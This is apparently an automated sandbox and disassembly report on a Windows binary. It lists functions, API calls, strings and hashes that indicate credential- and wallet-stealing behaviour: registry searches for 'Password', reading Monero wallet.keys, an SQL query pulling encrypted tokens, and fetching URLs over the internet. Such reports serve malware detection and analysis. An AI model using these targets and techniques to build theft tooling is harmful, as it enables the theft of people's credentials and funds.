                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID:
                      • API String ID: 2507841554-0
                      • Opcode ID: 973c3ea6f3f7b999bf3fb7c0630d42af7b76418b304d2b5eb91d0512b1fe1596
                      • Instruction ID: 456b947ae918bb55dc7e7c0108a6835d5ba4f3e61a29b63a28b14e24b28a3f68
                      • Opcode Fuzzy Hash: 973c3ea6f3f7b999bf3fb7c0630d42af7b76418b304d2b5eb91d0512b1fe1596
                      • Instruction Fuzzy Hash: B151A8B1900218ABDF20EF90CC45BEF7779FB44305F10849AB605A71C0EB78AA85CF5A
                      Function 004672D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0046733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004673B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0046740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00467452
                      • HeapFree.KERNEL32(00000000), ref: 00467459
                      • task.LIBCPMTD ref: 00467555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuetask
                      • String ID: Password
                      • API String ID: 775622407-3434357891
                      • Opcode ID: 5372b32669840a926ca3118bc2d6069ee75be04c56f8bbfee4a63143b0460599
                      • Instruction ID: 48fc46eff5e0435770fe4509d71f688159ab422c1701c27c0bc9b52fae7f562b
                      • Opcode Fuzzy Hash: 5372b32669840a926ca3118bc2d6069ee75be04c56f8bbfee4a63143b0460599
                      • Instruction Fuzzy Hash: 78616FB580411C9BDB24DB50CC55BDAB7B8BF44304F0085EAE649A6241EF746FC9CF96
                      Function 0046BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                      • lstrlen.KERNEL32(00000000), ref: 0046BC9F
                        • Part of subcall function 00478E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00478E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0046BCCD
                      • lstrlen.KERNEL32(00000000), ref: 0046BDA5
                      • lstrlen.KERNEL32(00000000), ref: 0046BDB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: 591d0499307d4fe54a8bc5b2e222dd0ccdf3fccec72c13b51f8f3f189074c871
                      • Instruction ID: a4a9d1e7913353b9e2a528aa54a9e2262e657f208afa24f52c55bd27e171e6f4
                      • Opcode Fuzzy Hash: 591d0499307d4fe54a8bc5b2e222dd0ccdf3fccec72c13b51f8f3f189074c871
                      • Instruction Fuzzy Hash: D9B153719101049BDB04FBA1CD56EEE7339AF94304F40851FF50AA6191EF386A69CBBB
                      Function 00476770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: b6663c45426f3309c54188021e4020df16b4822ddcf0a68355e7a050ca859deb
                      • Instruction ID: 2c97de14684d2d53e1248e6507fc656c545437111bbfad723ee5d98e42afbf46
                      • Opcode Fuzzy Hash: b6663c45426f3309c54188021e4020df16b4822ddcf0a68355e7a050ca859deb
                      • Instruction Fuzzy Hash: BCF03A34904209EFD384AFE0E90977D7B72FB06703F04019EE60986290D774AE51DF96
                      Function 00464FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00464FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00464FD1
                      • InternetOpenA.WININET(00480DDF,00000000,00000000,00000000,00000000), ref: 00464FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00465011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00465041
                      • InternetCloseHandle.WININET(?), ref: 004650B9
                      • InternetCloseHandle.WININET(?), ref: 004650C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: b44e183d9b67ccd6265539b01a89caea1c0ab67cefb4977eb094ef3403ae4921
                      • Instruction ID: ed2c599e868ebd631fa47ac900a6e7947ceb9c65194e7e084936c7fa26023389
                      • Opcode Fuzzy Hash: b44e183d9b67ccd6265539b01a89caea1c0ab67cefb4977eb094ef3403ae4921
                      • Instruction Fuzzy Hash: 8E3108B4A00218ABDB20DF94DC85BDDB7B5EB48704F1081DAEA09A7281D7746EC5CF99
                      Function 004783DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00478426
                      • wsprintfA.USER32 ref: 00478459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0047847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0047848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00478499
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                      • RegQueryValueExA.ADVAPI32(00000000,00E8D938,00000000,000F003F,?,00000400), ref: 004784EC
                      • lstrlen.KERNEL32(?), ref: 00478501
                      • RegQueryValueExA.ADVAPI32(00000000,00E8D9F8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00480B34), ref: 00478599
                      • RegCloseKey.ADVAPI32(00000000), ref: 00478608
                      • RegCloseKey.ADVAPI32(00000000), ref: 0047861A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: b11ae06f6f40b8f7a10ab20d83793af282d7dd18ce34607ed0c2cf44a5a9991b
                      • Instruction ID: 8d437411e6a9155a042d296c66aba4ed6d9bf03c54ebf260c29c7284c754596b
                      • Opcode Fuzzy Hash: b11ae06f6f40b8f7a10ab20d83793af282d7dd18ce34607ed0c2cf44a5a9991b
                      • Instruction Fuzzy Hash: 99212771940218ABDB24DB54CC85FE9B3B9FB48700F00C5DAE609A6240DF75AA85CFE8
                      Function 00477690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004776A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 004776AB
                      • RegOpenKeyExA.ADVAPI32(80000002,00E7BCE8,00000000,00020119,00000000), ref: 004776DD
                      • RegQueryValueExA.ADVAPI32(00000000,00E8D908,00000000,00000000,?,000000FF), ref: 004776FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 00477708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3225020163-2517555085
                      • Opcode ID: 8f7590db52af335cbb6b918a840ddfc713a07414e1ae9c23fdea374bda2a7d8a
                      • Instruction ID: 690980cac9dd5471e626819994999d3aa72dd72c774b51a673e2b0f7daaa6dfd
                      • Opcode Fuzzy Hash: 8f7590db52af335cbb6b918a840ddfc713a07414e1ae9c23fdea374bda2a7d8a
                      • Instruction Fuzzy Hash: 38018FB8A00204BBDB00EBE4DD49FAEB7B9EB48701F008456FA05D7290D778B904CF55
                      Function 00477720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0047773B
                      • RegOpenKeyExA.ADVAPI32(80000002,00E7BCE8,00000000,00020119,004776B9), ref: 0047775B
                      • RegQueryValueExA.ADVAPI32(004776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0047777A
                      • RegCloseKey.ADVAPI32(004776B9), ref: 00477784
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      • Opcode ID: bf5bce400ffeb2b7fd448b658119d4515ba8203642f2d55fa8f0dfd9153969b9
                      • Instruction ID: 2640b826bcb3501b8b6709b0c4d473a3151af336725531a9a1e267f443716b98
                      • Opcode Fuzzy Hash: bf5bce400ffeb2b7fd448b658119d4515ba8203642f2d55fa8f0dfd9153969b9
                      • Instruction Fuzzy Hash: 840121B9A40208BBDB00EBE0DC49FAEB7B9EB44701F10455AFA05A6281DB74A500CF51
                      Function 004792E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(:G,80000000,00000003,00000000,00000003,00000080,00000000,?,00473AEE,?), ref: 004792FC
                      • GetFileSizeEx.KERNEL32(000000FF,:G), ref: 00479319
                      • CloseHandle.KERNEL32(000000FF), ref: 00479327
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID: :G$:G
                      • API String ID: 1378416451-4278336346
                      • Opcode ID: 1fb9456c85df59f14a230794e4da31cdf51ef812b5d9958edd981d2edc79b165
                      • Instruction ID: 500141bce29bbf8f19a6fe824c3df3d6f464e5b3af7e5c66c0951ab85d08c6f9
                      • Opcode Fuzzy Hash: 1fb9456c85df59f14a230794e4da31cdf51ef812b5d9958edd981d2edc79b165
                      • Instruction Fuzzy Hash: AEF03139E40204BBDB10DFF0DC45B9E77B9AB48750F10C195B955A72D0D678AA01CF45
                      Function 004699C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004699EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00469A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00469A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,0046148F,00000000), ref: 00469A5A
                      • LocalFree.KERNEL32(0046148F), ref: 00469A90
                      • CloseHandle.KERNEL32(000000FF), ref: 00469A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 0b43392e62828c2c823e1099c9987513e9b20725477561c3c5c686b134368e23
                      • Instruction ID: 6a71a9d1c1637e4553d90138632fcdb4a0d7b569a0b5986ca4cb74fd31a577e6
                      • Opcode Fuzzy Hash: 0b43392e62828c2c823e1099c9987513e9b20725477561c3c5c686b134368e23
                      • Instruction Fuzzy Hash: B531F3B4A00209EFDB14DFD4C885BAE77F9BF49300F108159E911AB390D778AA41CFA6
                      Function 00474780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcat.KERNEL32(?,00E8DCC8), ref: 004747DB
                        • Part of subcall function 00478DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00478E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00474801
                      • lstrcat.KERNEL32(?,?), ref: 00474820
                      • lstrcat.KERNEL32(?,?), ref: 00474834
                      • lstrcat.KERNEL32(?,00E7B068), ref: 00474847
                      • lstrcat.KERNEL32(?,?), ref: 0047485B
